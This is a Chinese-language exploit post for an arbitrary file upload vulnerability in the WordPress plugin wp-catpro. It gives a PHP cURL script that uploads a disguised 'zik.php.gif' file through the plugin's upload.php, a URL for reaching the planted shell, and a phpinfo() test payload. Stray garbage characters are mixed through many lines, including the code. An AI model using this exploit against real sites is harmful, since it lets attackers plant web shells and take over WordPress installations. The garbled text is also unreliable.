WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
9 B, _9 M+ i, V- {
5 _: B# W. R4 V9 }9 ]: S- U作者  => Zikou-16
- I0 g. B& Y  z: U1 ], h+ [2 h邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
9 k" K' t8 ^% _------------------
% m) V# r! }( L7 F) v7 a0 q# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
& l7 J* a2 q2 }& |- }- X; L------------------

) k+ D* P/ z: ]) K. R( w#=> Exploit
2 G6 `7 p/ N$ R3 S-----------
<?php
7 H: Y, \7 l9 F3 V2 ~1 B8 O8 j
$uploadfile="zik.php.gif";
" w( Y9 t( |& ]7 |$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
! p% d) B3 ]( J% Ecurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
% U$ S+ u8 l' i, v6 P$postResult = curl_exec($ch);
curl_close($ch);

( @7 l9 n( E" V: y* Q5 Fprint "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
( C, _1 ]' ~2 L- r' ?1 P<?php
; f( C+ `" S( m) Y9 M' V3 d% ~phpinfo();
?>